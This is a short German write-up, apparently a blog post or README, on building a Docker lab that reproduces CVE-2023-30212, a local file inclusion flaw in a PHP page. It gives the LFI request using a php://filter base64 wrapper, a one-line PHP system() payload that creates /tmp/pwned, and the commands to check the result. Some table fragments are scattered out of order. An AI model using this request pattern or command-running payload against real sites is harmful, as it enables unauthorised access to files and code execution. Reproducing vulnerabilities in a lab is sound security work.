
PoC für CVE-2023-30212 mit Docker
PoC für CVE-2023-30212 mit Docker
Dieser Bericht dokumentiert den Aufbau einer Docker-basierten verwundbaren Webumgebung für die Schwachstelle CVE-2023-30212, die in Vulhub nicht vorhanden ist, sowie den Nachweis dieser Schwachstelle mittels PoC.
php:8.1-apachevulnerable.php und malicious.php in das Verzeichnis /var/www/html8088
| Dateiname | Beschreibung |
|---|---|
vulnerable.php | PHP-Datei mit LFI-Schwachstelle |
malicious.php |
---
docker-compose up -d
Container-Name: cve-2023-30212-cve-lfi-1
Der Apache-Server wird gestartet und ist unter http://localhost:8088 erreichbar.
http://localhost:8088/vulnerable.php?file=php://filter/convert.base64-encode/resource=malicious.php
Die Dekodierung der Ausgabe ergibt den folgenden PHP-Code:
<?php system("touch /tmp/pwned"); ?>
http://localhost:8088/malicious.php
Nach der Ausführung des Befehls sollte die Datei /tmp/pwned erstellt werden.
docker exec -it cve-2023-30212-cve-lfi-1 ls /tmp
Wenn die Datei pwned in der Ausgabe vorhanden ist, war der Vorgang erfolgreich.
| Bösartige PHP-Datei zur Ausführung von Systembefehlen |
docker-compose.yml | Konfigurationsdatei für den Containeraufbau |
Dockerfile | Konfigurationsdatei zur Erstellung des Docker-Images |